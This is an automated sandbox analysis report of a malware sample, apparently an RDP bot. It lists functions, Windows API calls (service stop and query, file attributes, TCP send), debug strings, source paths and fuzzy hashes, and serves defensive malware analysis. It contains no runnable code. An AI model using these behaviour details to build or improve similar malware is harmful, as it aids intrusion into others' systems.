Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLast$Resource$FindLoadfflushfwrite
String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
API String ID: 2123903355-2019010457
Opcode ID: 571ab3cfc749547104663c8428ec93bde6d77b031c2874d4d265202845669f56
Instruction ID: ba41465b2829cbb7e745b242e66f1c8ec6bb5f825a7bf084df2ae01888d0b8fc
Opcode Fuzzy Hash: 571ab3cfc749547104663c8428ec93bde6d77b031c2874d4d265202845669f56
Instruction Fuzzy Hash: 0C417479B0A24A8BDB51CF28E46466977E0FB0AB64F400135EE5C8379AEF7CE540CB44

Function 00007FFDA55AD9A1 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FFDA55ADA66
GetProcessHeap.KERNEL32 ref: 00007FFDA55ADA74
HeapAlloc.KERNEL32 ref: 00007FFDA55ADA85
strlen.MSVCRT ref: 00007FFDA55ADAA3
GetProcessHeap.KERNEL32 ref: 00007FFDA55ADAD1
HeapFree.KERNEL32 ref: 00007FFDA55ADAE2

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFDA55ADAF7
mem_alloc, xrefs: 00007FFDA55ADAF0
ini_get_bytes, xrefs: 00007FFDA55ADA14, 00007FFDA55ADA44
(buf != NULL), xrefs: 00007FFDA55ADA0D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55ADA1B, 00007FFDA55ADA4B
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFDA55ADA06, 00007FFDA55ADA36
(buf_sz != NULL), xrefs: 00007FFDA55ADA3D

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Heap$Processstrlen$AllocFree
String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
API String ID: 1318626975-3964590784
Opcode ID: e7ddd0059b9cb393920fbdb9b1ee023d8d4bc45013e3b081370558f04b77c417
Instruction ID: 7e73d363a18117eecd1d877dadbc0e34d34941491d33c361f16d3931cf24652f
Opcode Fuzzy Hash: e7ddd0059b9cb393920fbdb9b1ee023d8d4bc45013e3b081370558f04b77c417
Instruction Fuzzy Hash: DD315F69B0AA4F84FB12AF15A4383B522A0AF43F84F490431DA4E077D7EF3DE9458748

Function 00007FFDA55A7227 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 152serviceCOMMON

Download Yara Rule

APIs

OpenServiceA.ADVAPI32 ref: 00007FFDA55A7246
QueryServiceStatusEx.ADVAPI32 ref: 00007FFDA55A7270
CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A728B
GetLastError.KERNEL32 ref: 00007FFDA55A72CB
GetLastError.KERNEL32 ref: 00007FFDA55A73B0

Strings

C:/Projects/rdp/bot/codebase/scm.c, xrefs: 00007FFDA55A72A3
service_query_status, xrefs: 00007FFDA55A72B1, 00007FFDA55A72D9, 00007FFDA55A73BE
[E] (%s) -> OpenServiceA(SERVICE_QUERY_STATUS) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A72E0
(svc != NULL), xrefs: 00007FFDA55A72AA
[E] (%s) -> QueryServiceStatusEx(SC_STATUS_PROCESS_INFO) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A73C5
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55A72B8

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Service$ErrorLast$CloseHandleOpenQueryStatus
String ID: (svc != NULL)$C:/Projects/rdp/bot/codebase/scm.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> OpenServiceA(SERVICE_QUERY_STATUS) failed(lpServiceName=%s,gle=%lu)$[E] (%s) -> QueryServiceStatusEx(SC_STATUS_PROCESS_INFO) failed(lpServiceName=%s,gle=%lu)$service_query_status
API String ID: 1743273550-1326671558
Opcode ID: 27ca208026315e5f24de18a0e699509c736c6ba9a65b60b29ef211bafcce92cf
Instruction ID: e2fabb818167f36f149e13a689e43906d8360ea028a42b1b558f76a36206c949
Opcode Fuzzy Hash: 27ca208026315e5f24de18a0e699509c736c6ba9a65b60b29ef211bafcce92cf
Instruction Fuzzy Hash: 3D516D5AF1E52F81FA725E94A4683BC46465F03F55F160832DE4E273D3AE5FAC8042CA

Function 00007FFDA55A1634 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FFDA55A170E

Part of subcall function 00007FFDA55A13D9: GetFileAttributesA.KERNEL32 ref: 00007FFDA55A13FA

SetFileAttributesA.KERNEL32 ref: 00007FFDA55A167B

Strings

(attr != NULL), xrefs: 00007FFDA55A16CB
[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FFDA55A1725
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55A16AE, 00007FFDA55A16D9
(path != NULL), xrefs: 00007FFDA55A16A0
NULL, xrefs: 00007FFDA55A1844
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FFDA55A185A
[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x), xrefs: 00007FFDA55A17F4
fs_attr_set, xrefs: 00007FFDA55A16A7, 00007FFDA55A16D2, 00007FFDA55A171E, 00007FFDA55A17ED, 00007FFDA55A1853
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFDA55A1699, 00007FFDA55A16C4

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: AttributesFile$ErrorLast
String ID: (attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,attr=%08lx,err=%08x)$[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu)$fs_attr_set
API String ID: 365566950-3085771803
Opcode ID: 118d91c88687168bb50805d1646bdb282ccb7107512dfdb4efd46badff4f737d
Instruction ID: c5a8b2e15decbb3ae6d3f722b700075fea256eca6a93a8f3e1484829dcc87361
Opcode Fuzzy Hash: 118d91c88687168bb50805d1646bdb282ccb7107512dfdb4efd46badff4f737d
Instruction Fuzzy Hash: AD517B7DF0E20F85FE239F50A5683796290AF02B84F145932DA1E867D7EF6DE8418709

Function 00007FFDA55AF9A2 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 87synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32 ref: 00007FFDA55AF9B3
GetLastError.KERNEL32 ref: 00007FFDA55AFA0C

Strings

C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FFDA55AF9E4
P, xrefs: 00007FFDA55AFA93
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55AF9F9
, xrefs: 00007FFDA55AFA2E
~, xrefs: 00007FFDA55AFA8E
[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu), xrefs: 00007FFDA55AFA22
process_wait, xrefs: 00007FFDA55AF9F2, 00007FFDA55AFA1B
(pi != NULL), xrefs: 00007FFDA55AF9EB

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: $(pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> WaitForSingleObject failed(pid=%lugle=%lu)$process_wait$~
API String ID: 1211598281-4195011794
Opcode ID: a91e3d988756e2a48877d66e165801d7a03b03c4b6efa01dd86f11ebe0b56f3f
Instruction ID: 907bb14dfaeb9433ce4107e96f996b0f9273dfc46e22b25ff252ef4da275ed02
Opcode Fuzzy Hash: a91e3d988756e2a48877d66e165801d7a03b03c4b6efa01dd86f11ebe0b56f3f
Instruction Fuzzy Hash: 0F310A2CF0F20F96FA624F94A4A87BD12549F06B09E240933C74E467D7AD9EA885C259

Function 00007FFDA55B0244 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00007FFDA55B02ED
VirtualProtect.KERNEL32 ref: 00007FFDA55B0355
GetLastError.KERNEL32 ref: 00007FFDA55B035F

Strings

Mingw-w64 runtime failure:, xrefs: 00007FFDA55B020B
Address %p has no image-section, xrefs: 00007FFDA55B02A5
VirtualProtect failed with code 0x%x, xrefs: 00007FFDA55B0365
Unknown pseudo relocation protocol version %d., xrefs: 00007FFDA55B0249
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FFDA55B0302

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Virtual$ErrorLastProtectQuery
String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 637304234-2693646698
Opcode ID: ea52c8d6c1307b8a334d5e44ba4476aadd38c7b73436a73b6dc99475cb645e3c
Instruction ID: 96d96c0fe6ba5ec2ffeb996128bd04c7949ebdca0f2d222c00d46a17ddbb6a7e
Opcode Fuzzy Hash: ea52c8d6c1307b8a334d5e44ba4476aadd38c7b73436a73b6dc99475cb645e3c
Instruction Fuzzy Hash: C131B129B07A0A86EE02CF51E86976963E0EB8AF80F458135DD0D07376EE3CE585C748

Function 00007FFDA55AB56D Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 66networkCOMMON

Download Yara Rule

APIs

send.WS2_32 ref: 00007FFDA55AB5BB
WSAGetLastError.WS2_32 ref: 00007FFDA55AB5CA

Strings

tcp_send, xrefs: 00007FFDA55AB5D6, 00007FFDA55AB607
tcp_recv, xrefs: 00007FFDA55AB627
[E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d), xrefs: 00007FFDA55AB60E
[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFDA55AB5DD
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFDA55AB62E

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: ErrorLastsend
String ID: [E] (%s) -> !!!WTF!!!(sock=0x%llx,l=%d,n=%d)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> send failed(sock=0x%llx,WSAgle=%d)$tcp_recv$tcp_send
API String ID: 1802528911-690514478
Opcode ID: 4696e067596304e8daf50865a739a9a4465fd7ef701951fddedde6edb7a6f13d
Instruction ID: 3c948485d77f0a8b77e203186ed6234bd7d92da2735f1e5add6335e7f5713a80
Opcode Fuzzy Hash: 4696e067596304e8daf50865a739a9a4465fd7ef701951fddedde6edb7a6f13d
Instruction Fuzzy Hash: D521B369B0A54F42EA224F25A9687B452417F0BFB0F980730DE2C477D3FE1EA5458349

Function 00007FFDA55A6CCD Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDA55A6C55: FreeLibrary.KERNEL32 ref: 00007FFDA55A6C87

GetProcessHeap.KERNEL32 ref: 00007FFDA55A6D38
HeapFree.KERNEL32 ref: 00007FFDA55A6D49

Part of subcall function 00007FFDA55ACDB2: GetProcessHeap.KERNEL32 ref: 00007FFDA55ACDFD
Part of subcall function 00007FFDA55ACDB2: HeapFree.KERNEL32 ref: 00007FFDA55ACE0E

Strings

[W] (%s) -> Unsupported library version(ver_s=%s), xrefs: 00007FFDA55A6DEE
%d.%d.%d.%d, xrefs: 00007FFDA55A6D98
check_version, xrefs: 00007FFDA55A6DCA, 00007FFDA55A6DE7
termsrv32.ini, xrefs: 00007FFDA55A6D1C
[I] (%s) -> Supported library version(ver_s=%s), xrefs: 00007FFDA55A6DD1

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Heap$Free$Process$Library
String ID: %d.%d.%d.%d$[I] (%s) -> Supported library version(ver_s=%s)$[W] (%s) -> Unsupported library version(ver_s=%s)$check_version$termsrv32.ini
API String ID: 3459754157-3683084121
Opcode ID: c23690aed3ba96d1316742d7162e3a5219ff59d77c763922ba17b8b98f5d4f1d
Instruction ID: 76e0d097029b61dcd161d393b74683618955d114690591506079e26c7a512616
Opcode Fuzzy Hash: c23690aed3ba96d1316742d7162e3a5219ff59d77c763922ba17b8b98f5d4f1d
Instruction Fuzzy Hash: C3315E69B0A58F91EB629F21A8683BA6360FF82B80F441431EB4D46796EE3DD545C708

Function 00007FFDA55A8563 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A87AF
OpenServiceA.ADVAPI32 ref: 00007FFDA55A87CD
ControlService.ADVAPI32 ref: 00007FFDA55A87EC
GetLastError.KERNEL32 ref: 00007FFDA55A87FA

Strings

[E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A881B
scm_stop, xrefs: 00007FFDA55A8814

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Service$CloseControlErrorHandleLastOpen
String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
API String ID: 3311966420-638458398
Opcode ID: 9d32a450d9529e4f7208059fe122acd65ec6d0a44146d9feb9c1b3c48191f629
Instruction ID: 33a9f9283e07f922861d50b40c5f8e7e79f4cf13a956ea2dadcb6beb658e8062
Opcode Fuzzy Hash: 9d32a450d9529e4f7208059fe122acd65ec6d0a44146d9feb9c1b3c48191f629
Instruction Fuzzy Hash: AC016169B0AA0F61FE1A5F05E46837513A0BF07F45F054835CA0D43397EE3EE4448308

Function 00007FFDA55A84CC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A87AF
OpenServiceA.ADVAPI32 ref: 00007FFDA55A87CD
ControlService.ADVAPI32 ref: 00007FFDA55A87EC
GetLastError.KERNEL32 ref: 00007FFDA55A87FA

Strings

[E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A881B
scm_stop, xrefs: 00007FFDA55A8814

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Service$CloseControlErrorHandleLastOpen
String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
API String ID: 3311966420-638458398
Opcode ID: 5ae8186eb9aced61c16335e4d497b36d5146403487a7827606e0941bde00189c
Instruction ID: 8bde0b7423d58acdfc6be473f454fced9467307711ef6301d0333a903b615549
Opcode Fuzzy Hash: 5ae8186eb9aced61c16335e4d497b36d5146403487a7827606e0941bde00189c
Instruction Fuzzy Hash: 35016169B0AA0F61EE1A5F05E4A837613A0BF07F45F054835CA0D47397EE3EE4048308

Function 00007FFDA55A84A4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A87AF
OpenServiceA.ADVAPI32 ref: 00007FFDA55A87CD
ControlService.ADVAPI32 ref: 00007FFDA55A87EC
GetLastError.KERNEL32 ref: 00007FFDA55A87FA

Strings

[E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A881B
scm_stop, xrefs: 00007FFDA55A8814

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Service$CloseControlErrorHandleLastOpen
String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
API String ID: 3311966420-638458398
Opcode ID: 6980429015bf69b343a53b2273b3575ebf9ddc442d678d9aff60eac1e2079f65
Instruction ID: 81a24b1d22856c52847398b7973349a4f57774c365054549fcf2cf25fbfe7844
Opcode Fuzzy Hash: 6980429015bf69b343a53b2273b3575ebf9ddc442d678d9aff60eac1e2079f65
Instruction Fuzzy Hash: 25015E69B0AA0B61FA1A5F05E46837513A0BF07F45F054835CA0D42397EE3EE4448308

Function 00007FFDA55A84B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A87AF
OpenServiceA.ADVAPI32 ref: 00007FFDA55A87CD
ControlService.ADVAPI32 ref: 00007FFDA55A87EC
GetLastError.KERNEL32 ref: 00007FFDA55A87FA

Strings

[E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A881B
scm_stop, xrefs: 00007FFDA55A8814

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Service$CloseControlErrorHandleLastOpen
String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
API String ID: 3311966420-638458398
Opcode ID: 9d32a450d9529e4f7208059fe122acd65ec6d0a44146d9feb9c1b3c48191f629
Instruction ID: 33a9f9283e07f922861d50b40c5f8e7e79f4cf13a956ea2dadcb6beb658e8062
Opcode Fuzzy Hash: 9d32a450d9529e4f7208059fe122acd65ec6d0a44146d9feb9c1b3c48191f629
Instruction Fuzzy Hash: AC016169B0AA0F61FE1A5F05E46837513A0BF07F45F054835CA0D43397EE3EE4448308

Function 00007FFDA55A84AE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32 ref: 00007FFDA55A87AF
OpenServiceA.ADVAPI32 ref: 00007FFDA55A87CD
ControlService.ADVAPI32 ref: 00007FFDA55A87EC
GetLastError.KERNEL32 ref: 00007FFDA55A87FA

Strings

[E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu), xrefs: 00007FFDA55A881B
scm_stop, xrefs: 00007FFDA55A8814

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Service$CloseControlErrorHandleLastOpen
String ID: [E] (%s) -> ControlService(SERVICE_CONTROL_STOP) failed(lpServiceName=%s,gle=%lu)$scm_stop
API String ID: 3311966420-638458398
Opcode ID: 6effc39bc33150b246a3b0806f0a8cd94433cc8002ca06d808ad53691723484b
Instruction ID: e824c6afee1b3a2f4be3f5c69235bba1a46ecab86f4f73ca5ba0dcbdfe64785e
Opcode Fuzzy Hash: 6effc39bc33150b246a3b0806f0a8cd94433cc8002ca06d808ad53691723484b
Instruction Fuzzy Hash: 05011E69B0AA0F61FA1A5F15E46837517A0BF07F45F455835CA0D56397EE3EE4448308

Function 00007FFDA55A81B3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 33COMMON

Download Yara Rule

APIs

_stricmp.MSVCRT ref: 00007FFDA55A81F7

Strings

C:/Projects/rdp/bot/codebase/scm.c, xrefs: 00007FFDA55A820B
(name != NULL), xrefs: 00007FFDA55A8212
scm_find, xrefs: 00007FFDA55A8219
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFDA55A8220

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
